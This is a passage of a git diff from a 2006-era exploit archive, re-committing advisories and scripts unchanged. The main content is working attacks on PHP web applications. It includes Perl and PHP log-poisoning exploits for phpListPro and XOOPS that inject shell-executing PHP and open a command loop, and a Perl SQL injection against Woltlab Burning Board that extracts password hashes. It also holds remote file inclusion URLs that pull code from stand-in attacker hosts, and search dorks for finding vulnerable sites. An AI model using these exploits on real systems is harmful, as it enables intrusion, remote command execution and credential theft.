+http://www.site.com/[news_path]/sources/Admin/admin_cats.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/Admin/admin_edit.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/Admin/admin_import.php?CONFIG[main_path]=[evil_scripts]
+
+http://www.site.com/[news_path]/sources/Admin/admin_templates.php?CONFIG[main_path]=[evil_scripts]
+
+###################################################################
+#Elo ;-)
+
+# milw0rm.com [2006-05-17]
diff --git a/platforms/php/webapps/1804.txt b/platforms/php/webapps/1804.txt
index 05acb9e7e..517200eef 100755
--- a/platforms/php/webapps/1804.txt
+++ b/platforms/php/webapps/1804.txt
@@ -1,9 +1,9 @@
-Title: phpBazar <= 2.1.0 Multiple vulnerabilites
-URL: http://www.smartisoft.com/
-Dork: inurl:classified.php phpbazar
-
-Exploits:
--remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
--access to admin login and password: /admin/admin.php?action=edit_member&value=1
-
-# milw0rm.com [2006-05-19]
+Title: phpBazar <= 2.1.0 Multiple vulnerabilites
+URL: http://www.smartisoft.com/
+Dork: inurl:classified.php phpbazar
+
+Exploits:
+-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls
+-access to admin login and password: /admin/admin.php?action=edit_member&value=1
+
+# milw0rm.com [2006-05-19]
diff --git a/platforms/php/webapps/1805.pl b/platforms/php/webapps/1805.pl
index b295e94bc..c8b02c126 100755
--- a/platforms/php/webapps/1805.pl
+++ b/platforms/php/webapps/1805.pl
@@ -1,103 +1,103 @@
-#!/usr/bin/perl
-#
-# Title: phpListPro <= 2.0.1 Remote Command Execution Exploit
-# URL: http://www.smartisoft.com/
-#
-# Info: 
-# - arbitrary local inclusion 
-# - need magic_quotes_gpc=off
-# 
-#
-
-use IO::Socket;
-use LWP::Simple;
-
-#ripped from rgod
-
-@apache=(
-  "/var/log/httpd/access_log%00",
-  "/var/log/httpd/error_log%00",
-  "/var/log/apache/error.log%00",
-  "/var/log/apache/access.log%00",  
-  "/apache/logs/error.log%00",
-  "/apache/logs/access.log%00",
-  "/etc/httpd/logs/acces_log%00",
-  "/etc/httpd/logs/acces.log%00",
-  "/etc/httpd/logs/error_log%00",
-  "/etc/httpd/logs/error.log%00",
-  "/var/www/logs/access_log%00",
-  "/var/www/logs/access.log%00",
-  "/usr/local/apache/logs/access_log%00",
-  "/usr/local/apache/logs/access.log%00",
-  "/var/log/apache/access_log%00",
-  "/var/log/apache/access.log%00",
-  "/var/log/access_log%00",
-  "/var/www/logs/error_log%00",
-  "/www/logs/error.log%00",
-  "/usr/local/apache/logs/error_log%00",
-  "/usr/local/apache/logs/error.log%00",
-  "/var/log/apache/error_log%00",
-  "/var/log/apache/error.log%00",
-  "/var/log/access_log%00",
-  "/var/log/error_log%00",
-);
-
-print "[i] phpListPro remote command execution exploit\n";
-print "[i] Need magic_quotes_gpc=off\n";
-print "[i] Coded by [Oo]\n\n";
-
-
-if (@ARGV < 3)
-{
-	print "[*] Usage: phplistpro_exp.pl [host] [path] [apache_path]\n\n";
-	print "[*] Apache_Path: \n";
-	$i = 0;
-	while($apache[$i])
-	{
-		print "[$i] $apache[$i]\n";
-		$i++;
-	}
-	print "\n[*] Exemple: phplistpro_exp.pl 127.0.0.1 /phplistpro/ 1\n";
-	exit();
-}
-
-$serv=$ARGV[0];
-$path=$ARGV[1];
-$type=$ARGV[2];
-
-print "[+] Injecting some code in log files...\n";
-#ripped from rgod
-$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
-$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";
-print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
-print $socket "User-Agent: ".$CODE."\r\n";
-print $socket "Host: ".$serv."\r\n";
-print $socket "Connection: close\r\n\r\n";
-close($socket);
-
-print "[+] Ok! Now here the shell, type exit to quit\n";
-print "[+] If it's not work maybe try another apache_path...\n\n";
-
-print "[shell] ";
-$cmd = <STDIN>;
-
-while($cmd !~ "exit")
-{
-	$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";
-	
-	print $socket "GET ".$path."config.php HTTP/1.1\r\n";
-	print $socket "Host: ".$serv."\r\n";
-	print $socket "Accept: */*\r\n";
-	print $socket "Cookie: Language=/../../../../../../../../../..".$apache[$type].";cmd=$cmd \r\n";
-	print $socket "Connection: close\r\n\n";	
-	
-	while ($answer = <$socket>)
-	{
-		print $answer;
-	}
-	
-	print "[shell] ";
-	$cmd = <STDIN>;	
-}
-
-# milw0rm.com [2006-05-19]
+#!/usr/bin/perl
+#
+# Title: phpListPro <= 2.0.1 Remote Command Execution Exploit
+# URL: http://www.smartisoft.com/
+#
+# Info: 
+# - arbitrary local inclusion 
+# - need magic_quotes_gpc=off
+# 
+#
+
+use IO::Socket;
+use LWP::Simple;
+
+#ripped from rgod
+
+@apache=(
+  "/var/log/httpd/access_log%00",
+  "/var/log/httpd/error_log%00",
+  "/var/log/apache/error.log%00",
+  "/var/log/apache/access.log%00",  
+  "/apache/logs/error.log%00",
+  "/apache/logs/access.log%00",
+  "/etc/httpd/logs/acces_log%00",
+  "/etc/httpd/logs/acces.log%00",
+  "/etc/httpd/logs/error_log%00",
+  "/etc/httpd/logs/error.log%00",
+  "/var/www/logs/access_log%00",
+  "/var/www/logs/access.log%00",
+  "/usr/local/apache/logs/access_log%00",
+  "/usr/local/apache/logs/access.log%00",
+  "/var/log/apache/access_log%00",
+  "/var/log/apache/access.log%00",
+  "/var/log/access_log%00",
+  "/var/www/logs/error_log%00",
+  "/www/logs/error.log%00",
+  "/usr/local/apache/logs/error_log%00",
+  "/usr/local/apache/logs/error.log%00",
+  "/var/log/apache/error_log%00",
+  "/var/log/apache/error.log%00",
+  "/var/log/access_log%00",
+  "/var/log/error_log%00",
+);
+
+print "[i] phpListPro remote command execution exploit\n";
+print "[i] Need magic_quotes_gpc=off\n";
+print "[i] Coded by [Oo]\n\n";
+
+
+if (@ARGV < 3)
+{
+	print "[*] Usage: phplistpro_exp.pl [host] [path] [apache_path]\n\n";
+	print "[*] Apache_Path: \n";
+	$i = 0;
+	while($apache[$i])
+	{
+		print "[$i] $apache[$i]\n";
+		$i++;
+	}
+	print "\n[*] Exemple: phplistpro_exp.pl 127.0.0.1 /phplistpro/ 1\n";
+	exit();
+}
+
+$serv=$ARGV[0];
+$path=$ARGV[1];
+$type=$ARGV[2];
+
+print "[+] Injecting some code in log files...\n";
+#ripped from rgod
+$CODE="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
+$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";
+print $socket "GET ".$path.$CODE." HTTP/1.1\r\n";
+print $socket "User-Agent: ".$CODE."\r\n";
+print $socket "Host: ".$serv."\r\n";
+print $socket "Connection: close\r\n\r\n";
+close($socket);
+
+print "[+] Ok! Now here the shell, type exit to quit\n";
+print "[+] If it's not work maybe try another apache_path...\n\n";
+
+print "[shell] ";
+$cmd = <STDIN>;
+
+while($cmd !~ "exit")
+{
+	$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", PeerPort=>"80") or die "[-] Connecting ... Could not connect to host.\n\n";
+	
+	print $socket "GET ".$path."config.php HTTP/1.1\r\n";
+	print $socket "Host: ".$serv."\r\n";
+	print $socket "Accept: */*\r\n";
+	print $socket "Cookie: Language=/../../../../../../../../../..".$apache[$type].";cmd=$cmd \r\n";
+	print $socket "Connection: close\r\n\n";	
+	
+	while ($answer = <$socket>)
+	{
+		print $answer;
+	}
+	
+	print "[shell] ";
+	$cmd = <STDIN>;	
+}
+
+# milw0rm.com [2006-05-19]
diff --git a/platforms/php/webapps/1808.txt b/platforms/php/webapps/1808.txt
index a40d3cdd5..8cc650a5a 100755
--- a/platforms/php/webapps/1808.txt
+++ b/platforms/php/webapps/1808.txt
@@ -1,15 +1,15 @@
-Title       : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
--
-URL         : http://www.phpmydirectory.com/
--
-Dork        : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
--
-Author      : OLiBekaS
--
-contact     : olibekas[at]gmail.com
--
-greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
--
-Exploit     : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls
-
-# milw0rm.com [2006-05-19]
+Title       : phpMyDirectory <= 10.4.4 Remote File Inclusion Vulnerability
+-
+URL         : http://www.phpmydirectory.com/
+-
+Dork        : "powered by phpmydirectory" or intext:"2001-2006 phpMyDirectory.com"
+-
+Author      : OLiBekaS
+-
+contact     : olibekas[at]gmail.com
+-
+greetz      : Renzokuzen, Skulmatic, weleh, brokencode, bigmaster and all #papmahackerlink crew
+-
+Exploit     : http://[target]/[path]/cron.php?ROOT_PATH=http://[attacker]/cmd.txt?&cmd=ls
+
+# milw0rm.com [2006-05-19]
diff --git a/platforms/php/webapps/1809.txt b/platforms/php/webapps/1809.txt
index a4159625e..857ad8ae6 100755
--- a/platforms/php/webapps/1809.txt
+++ b/platforms/php/webapps/1809.txt
@@ -1,31 +1,31 @@
-################ DEVIL TEAM THE BEST POLISH TEAM #################
-#CaLogic Calendars V1.2.2 - Remote File Include
-#Find by Kacper (Rahim).
-#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
-#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
-#dork: CaLogic Calendars V1.2.2
-##################################################################
-reconfig.php:
-[code]
-include_once("./include/config.php");
-include_once($GLOBALS["CLPath"]."/classes/session.php");
-include_once($GLOBALS["CLPath"]."/include/gfunc.php");
-include_once($GLOBALS["CLPath"]."/classes/calogicautomation.php");
-[/code]
-
-http://site.com/[path]/reconfig.php?GLOBALS[CLPath]=[evil_script]
-
-
-srxclr.php:
-[code]
-include_once("./include/config.php");
-include_once($GLOBALS["CLPath"]."/include/calfunc.php");
-include_once($GLOBALS["CLPath"]."/include/gfunc.php");
-include_once($GLOBALS["CLPath"]."/include/efuncs.php");
-[/code]
-
-http://site.com/[path]/srxclr.php?GLOBALS[CLPath]=[evil_script]
-
-#pozdro :)
-
-# milw0rm.com [2006-05-20]
+################ DEVIL TEAM THE BEST POLISH TEAM #################
+#CaLogic Calendars V1.2.2 - Remote File Include
+#Find by Kacper (Rahim).
+#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
+#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
+#dork: CaLogic Calendars V1.2.2
+##################################################################
+reconfig.php:
+[code]
+include_once("./include/config.php");
+include_once($GLOBALS["CLPath"]."/classes/session.php");
+include_once($GLOBALS["CLPath"]."/include/gfunc.php");
+include_once($GLOBALS["CLPath"]."/classes/calogicautomation.php");
+[/code]
+
+http://site.com/[path]/reconfig.php?GLOBALS[CLPath]=[evil_script]
+
+
+srxclr.php:
+[code]
+include_once("./include/config.php");
+include_once($GLOBALS["CLPath"]."/include/calfunc.php");
+include_once($GLOBALS["CLPath"]."/include/gfunc.php");
+include_once($GLOBALS["CLPath"]."/include/efuncs.php");
+[/code]
+
+http://site.com/[path]/srxclr.php?GLOBALS[CLPath]=[evil_script]
+
+#pozdro :)
+
+# milw0rm.com [2006-05-20]
diff --git a/platforms/php/webapps/1810.pl b/platforms/php/webapps/1810.pl
index f1b949702..0fc93763a 100755
--- a/platforms/php/webapps/1810.pl
+++ b/platforms/php/webapps/1810.pl
@@ -1,75 +1,75 @@
-#!/usr/bin/perl
-
-use IO::Socket;
-
-print q{
-################################################################################
-##                                                                            ##
-##  Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit          ##
-##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
-##  Exploit by       |  666 (SR-Crew)                                         ##
-##  Bug by           |  x82                                                   ##
-##  Googledork       |  inurl:/wbb2/links.php?cat                             ##
-##  Usage            |  links.pl [server] [path]                              ##
-##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
-##                                                                            ##
-################################################################################
-
-};
-
-$webpage = $ARGV[0];
-$directory = $ARGV[1];
-
-if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }
-
-$wbb_dir = 
-"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
-
-$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
-PeerPort=>"80") || die "[+] Can't connect to Server\n";
-print "[+] Exploiting....\n";
-print $sock "GET $wbb_dir HTTP/1.1\n";
-print $sock "Accept: */*\n";
-print $sock "User-Agent: Hacker\n";
-print $sock "Host: $webpage\n";
-print $sock "Connection: close\n\n";
-
-while ($answer = <$sock>) {
-	if ($answer =~ 
-/(................................)<\/span><\/b><\/font>/) {
-		print "[+] Hash: $1\n";
-		exit();
-	}
-	if ($answer =~ /SQL-DATABASE ERROR/) {
-		break;
-	}
-}
-
-$wbb_dir = 
-"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
-close($sock);
-
-$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
-PeerPort=>"80") || die "[+] Can't connect to Server\n";
-print $sock "GET $wbb_dir HTTP/1.1\n";
-print $sock "Accept: */*\n";
-print $sock "User-Agent: Hacker\n";
-print $sock "Host: $webpage\n";
-print $sock "Connection: close\n\n";
-
-while ($answer = <$sock>) {
-	if ($answer =~ 
-/(................................)<\/span><\/b><\/font>/) {
-		print "[+] Hash: $1\n";
-		exit();
-	}
-	if ($answer =~ /SQL-DATABASE ERROR/) {
-		print "[+] Try replacing bb1_users with bb2_users\n";
-		break;
-	}
-}
-close($sock);
-
-print "[+] Exploit failed\n";
-
-# milw0rm.com [2006-05-20]
+#!/usr/bin/perl
+
+use IO::Socket;
+
+print q{
+################################################################################
+##                                                                            ##
+##  Woltlab Burning Board 2.3.4 <= "links.php" SQL Injection Exploit          ##
+##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
+##  Exploit by       |  666 (SR-Crew)                                         ##
+##  Bug by           |  x82                                                   ##
+##  Googledork       |  inurl:/wbb2/links.php?cat                             ##
+##  Usage            |  links.pl [server] [path]                              ##
+##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##
+##                                                                            ##
+################################################################################
+
+};
+
+$webpage = $ARGV[0];
+$directory = $ARGV[1];
+
+if (!$webpage||!$directory) { die "[+] Exploit failed\n"; }
+
+$wbb_dir = 
+"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
+
+$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
+PeerPort=>"80") || die "[+] Can't connect to Server\n";
+print "[+] Exploiting....\n";
+print $sock "GET $wbb_dir HTTP/1.1\n";
+print $sock "Accept: */*\n";
+print $sock "User-Agent: Hacker\n";
+print $sock "Host: $webpage\n";
+print $sock "Connection: close\n\n";
+
+while ($answer = <$sock>) {
+	if ($answer =~ 
+/(................................)<\/span><\/b><\/font>/) {
+		print "[+] Hash: $1\n";
+		exit();
+	}
+	if ($answer =~ /SQL-DATABASE ERROR/) {
+		break;
+	}
+}
+
+$wbb_dir = 
+"http://".$webpage.$directory."links.php?cat=31337+union+select+password,userid+from+bb1_users";
+close($sock);
+
+$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$webpage", 
+PeerPort=>"80") || die "[+] Can't connect to Server\n";
+print $sock "GET $wbb_dir HTTP/1.1\n";
+print $sock "Accept: */*\n";
+print $sock "User-Agent: Hacker\n";
+print $sock "Host: $webpage\n";
+print $sock "Connection: close\n\n";
+
+while ($answer = <$sock>) {
+	if ($answer =~ 
+/(................................)<\/span><\/b><\/font>/) {
+		print "[+] Hash: $1\n";
+		exit();
+	}
+	if ($answer =~ /SQL-DATABASE ERROR/) {
+		print "[+] Try replacing bb1_users with bb2_users\n";
+		break;
+	}
+}
+close($sock);
+
+print "[+] Exploit failed\n";
+
+# milw0rm.com [2006-05-20]
diff --git a/platforms/php/webapps/1811.php b/platforms/php/webapps/1811.php
index 08cdc4740..06892a453 100755
--- a/platforms/php/webapps/1811.php
+++ b/platforms/php/webapps/1811.php
@@ -1,224 +1,224 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-
-/*
- works with:
-  magic_quotes_gpc = Off
-  register_globals = On
-*/
-
-if ($argc<4) {
-echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
-echo "host:      target server (ip/hostname)\r\n";
-echo "path:      path to xoops\r\n";
-echo "cmd:       a shell command\r\n";
-echo "Options:\r\n";
-echo "   -p[port]:    specify a port other than 80\r\n";
-echo "   -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /xoops/ \r\n";
-echo "php ".$argv[0]." localhost /xoops/ ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
-die;
-}
-
-/* hi, back from my annual social engineering tour, this year in Milan ;)
-   welcome to this new 0day experience...
-   explaination:
-
-   vulnerable code in mainfile.php at lines 94-96:
-   ...
-   if (!isset($xoopsOption['nocommon']) && XOOPS_ROOT_PATH != '') {
-		include XOOPS_ROOT_PATH."/include/common.php";
-	}
-   ...
-
-   if register_globals = On you can overwrite $xoopsOption['nocommon'] var, to
-   skip common.php inclusion where $xoopsConfig['language'] and
-   $xoopsConfig['theme_set] are initialized, so, if magic_quotes_gpc=Off
-   you can include arbitrary files from local resources, ex., Apache log files:
-
-   http://[target]/[path]/misc.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[language]=../../../../../../../../../../var/log/httpd/access_log%00
-   http://[target]/[path]/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../../../../../../../../../../var/log/httpd/error_log%00
-
-   or, if avatar uploads are enabled:
-
-   http://[target]/xoops/html/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../uploads/cavt44703c30d3dbf.jpg%00
-
-   this tool inject some php code in apache log files and try to launch commands
-									      */
-
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
-  $result='';$exa='';$cont=0;
-  for ($i=0; $i<=strlen($string)-1; $i++)
-  {
-   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
-   {$result.="  .";}
-   else
-   {$result.="  ".$string[$i];}
-   if (strlen(dechex(ord($string[$i])))==2)
-   {$exa.=" ".dechex(ord($string[$i]));}
-   else
-   {$exa.=" 0".dechex(ord($string[$i]));}
-   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
-  }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function sendpacketii($packet)
-{
-  global $proxy, $host, $port, $html, $proxy_regex;
-  if ($proxy=='') {
-    $ock=fsockopen(gethostbyname($host),$port);
-    if (!$ock) {
-      echo 'No response from '.$host.':'.$port; die;
-    }
-  }
-  else {
-	$c = preg_match($proxy_regex,$proxy);
-    if (!$c) {
-      echo 'Not a valid proxy...';die;
-    }
-    $parts=explode(':',$proxy);
-    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
-    $ock=fsockopen($parts[0],$parts[1]);
-    if (!$ock) {
-      echo 'No response from proxy...';die;
-	}
-  }
-  fputs($ock,$packet);
-  if ($proxy=='') {
-    $html='';
-    while (!feof($ock)) {
-      $html.=fgets($ock);
-    }
-  }
-  else {
-    $html='';
-    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
-      $html.=fread($ock,1);
-    }
-  }
-  fclose($ock);
-  #debug
-  #echo "\r\n".$html;
-}
-
-$host=$argv[1];
-$path=$argv[2];
-$cmd="";$port=80;$proxy="";
-
-for ($i=3; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{$cmd.=" ".$argv[$i];}
-if ($temp=="-p")
-{
-  $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
-  $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
-if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
-
-echo "[1] Injecting some code in log files ...\r\n\r\n";
-$CODE="*delim*<?php error_reporting(0);set_time_limit(0);passthru(\$_COOKIE[cmd]);die;?>";
-$packet="GET ".$p.$CODE." HTTP/1.0\r\n";
-$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n";
-$packet.="Host: ".$host."\r\n";
-$packet.="Connection: close\r\n\r\n";
-sendpacketii($packet);
-sleep(1);
-
-//fill with possible locations...
-$paths=array(
-"../../../../../../../../../../var/log/httpd/access_log",
-"../../../../../../../../../../var/log/httpd/error_log",
-"../apache/logs/error.log",
-"../apache/logs/access.log",
-"../../apache/logs/error.log",
-"../../apache/logs/access.log",
-"../../../apache/logs/error.log",
-"../../../apache/logs/access.log",
-"../../../../apache/logs/error.log",
-"../../../../apache/logs/access.log",
-"../../../../../apache/logs/error.log",
-"../../../../../apache/logs/access.log",
-"../../../../../../apache/logs/error.log",
-"../../../../../../apache/logs/access.log",
-"../logs/error.log",
-"../logs/access.log",
-"../../logs/error.log",
-"../../logs/access.log",
-"../../../logs/error.log",
-"../../../logs/access.log",
-"../../../../logs/error.log",
-"../../../../logs/access.log",
-"../../../../../logs/error.log",
-"../../../../../logs/access.log",
-"../../../../../../logs/error.log",
-"../../../../../../logs/access.log",
-"../../../../../../../../../../etc/httpd/logs/acces_log",
-"../../../../../../../../../../etc/httpd/logs/acces.log",
-"../../../../../../../../../../etc/httpd/logs/error_log",
-"../../../../../../../../../../etc/httpd/logs/error.log",
-"../../../../../../../../../../var/www/logs/access_log",
-"../../../../../../../../../../var/www/logs/access.log",
-"../../../../../../../../../../usr/local/apache/logs/access_log",
-"../../../../../../../../../../usr/local/apache/logs/access.log",
-"../../../../../../../../../../var/log/apache/access_log",
-"../../../../../../../../../../var/log/apache/access.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/www/logs/error_log",
-"../../../../../../../../../../var/www/logs/error.log",
-"../../../../../../../../../../usr/local/apache/logs/error_log",
-"../../../../../../../../../../usr/local/apache/logs/error.log",
-"../../../../../../../../../../var/log/apache/error_log",
-"../../../../../../../../../../var/log/apache/error.log",
-"../../../../../../../../../../var/log/access_log",
-"../../../../../../../../../../var/log/error_log"
-);
-
-$xpl= array (
-	     "misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=",
-	     "index.php?xoopsOption[nocommon]=1&xoopsConfig[theme_set]="
-	     );
-
-for ($j=0; $j<=count($xpl)-1; $j++)
-{
-  for ($i=0; $i<=count($paths)-1; $i++)
-  {
-  $a=$i+2;
-  echo "[".$a."] Trying with: ".$xpl[$j].$paths[$i]."%00\r\n";
-  $packet ="GET ".$p.$xpl[$j].$paths[$i]."%00 HTTP/1.0\r\n";
-  $packet.="Host: ".$host."\r\n";
-  $packet.="Cookie: cmd=".$cmd.";\r\n";
-  $packet.="Connection: Close\r\n\r\n";
-  #debug
-  #echo quick_dump($packet);
-  sendpacketii($packet);
-  if (strstr($html,"*delim*"))
-    {
-      echo "Exploit succeeded...\r\n";
-      $temp=explode("*delim*",$html);
-      die($temp[1]);
-    }
-  }
-}
-//if you are here...
-echo "Exploit failed...";
-?>
-
-# milw0rm.com [2006-05-21]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+
+/*
+ works with:
+  magic_quotes_gpc = Off
+  register_globals = On
+*/
+
+if ($argc<4) {
+echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
+echo "host:      target server (ip/hostname)\r\n";
+echo "path:      path to xoops\r\n";
+echo "cmd:       a shell command\r\n";
+echo "Options:\r\n";
+echo "   -p[port]:    specify a port other than 80\r\n";
+echo "   -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /xoops/ \r\n";
+echo "php ".$argv[0]." localhost /xoops/ ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
+die;
+}
+
+/* hi, back from my annual social engineering tour, this year in Milan ;)
+   welcome to this new 0day experience...
+   explaination:
+
+   vulnerable code in mainfile.php at lines 94-96:
+   ...
+   if (!isset($xoopsOption['nocommon']) && XOOPS_ROOT_PATH != '') {
+		include XOOPS_ROOT_PATH."/include/common.php";
+	}
+   ...
+
+   if register_globals = On you can overwrite $xoopsOption['nocommon'] var, to
+   skip common.php inclusion where $xoopsConfig['language'] and
+   $xoopsConfig['theme_set] are initialized, so, if magic_quotes_gpc=Off
+   you can include arbitrary files from local resources, ex., Apache log files:
+
+   http://[target]/[path]/misc.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[language]=../../../../../../../../../../var/log/httpd/access_log%00
+   http://[target]/[path]/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../../../../../../../../../../var/log/httpd/error_log%00
+
+   or, if avatar uploads are enabled:
+
+   http://[target]/xoops/html/index.php?cmd=ls%20-la&xoopsOption[nocommon]=1&xoopsConfig[theme_set]=../uploads/cavt44703c30d3dbf.jpg%00
+
+   this tool inject some php code in apache log files and try to launch commands
+									      */
+
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+  $result='';$exa='';$cont=0;
+  for ($i=0; $i<=strlen($string)-1; $i++)
+  {
+   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+   {$result.="  .";}
+   else
+   {$result.="  ".$string[$i];}
+   if (strlen(dechex(ord($string[$i])))==2)
+   {$exa.=" ".dechex(ord($string[$i]));}
+   else
+   {$exa.=" 0".dechex(ord($string[$i]));}
+   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
+  }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+  global $proxy, $host, $port, $html, $proxy_regex;
+  if ($proxy=='') {
+    $ock=fsockopen(gethostbyname($host),$port);
+    if (!$ock) {
+      echo 'No response from '.$host.':'.$port; die;
+    }
+  }
+  else {
+	$c = preg_match($proxy_regex,$proxy);
+    if (!$c) {
+      echo 'Not a valid proxy...';die;
+    }
+    $parts=explode(':',$proxy);
+    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+    $ock=fsockopen($parts[0],$parts[1]);
+    if (!$ock) {
+      echo 'No response from proxy...';die;
+	}
+  }
+  fputs($ock,$packet);
+  if ($proxy=='') {
+    $html='';
+    while (!feof($ock)) {
+      $html.=fgets($ock);
+    }
+  }
+  else {
+    $html='';
+    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+      $html.=fread($ock,1);
+    }
+  }
+  fclose($ock);
+  #debug
+  #echo "\r\n".$html;
+}
+
+$host=$argv[1];
+$path=$argv[2];
+$cmd="";$port=80;$proxy="";
+
+for ($i=3; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{$cmd.=" ".$argv[$i];}
+if ($temp=="-p")
+{
+  $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+  $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
+if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
+
+echo "[1] Injecting some code in log files ...\r\n\r\n";
+$CODE="*delim*<?php error_reporting(0);set_time_limit(0);passthru(\$_COOKIE[cmd]);die;?>";
+$packet="GET ".$p.$CODE." HTTP/1.0\r\n";
+$packet.="User-Agent: ".$CODE." Googlebot/2.1\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: close\r\n\r\n";
+sendpacketii($packet);
+sleep(1);
+
+//fill with possible locations...
+$paths=array(
+"../../../../../../../../../../var/log/httpd/access_log",
+"../../../../../../../../../../var/log/httpd/error_log",
+"../apache/logs/error.log",
+"../apache/logs/access.log",
+"../../apache/logs/error.log",
+"../../apache/logs/access.log",
+"../../../apache/logs/error.log",
+"../../../apache/logs/access.log",
+"../../../../apache/logs/error.log",
+"../../../../apache/logs/access.log",
+"../../../../../apache/logs/error.log",
+"../../../../../apache/logs/access.log",
+"../../../../../../apache/logs/error.log",
+"../../../../../../apache/logs/access.log",
+"../logs/error.log",
+"../logs/access.log",
+"../../logs/error.log",
+"../../logs/access.log",
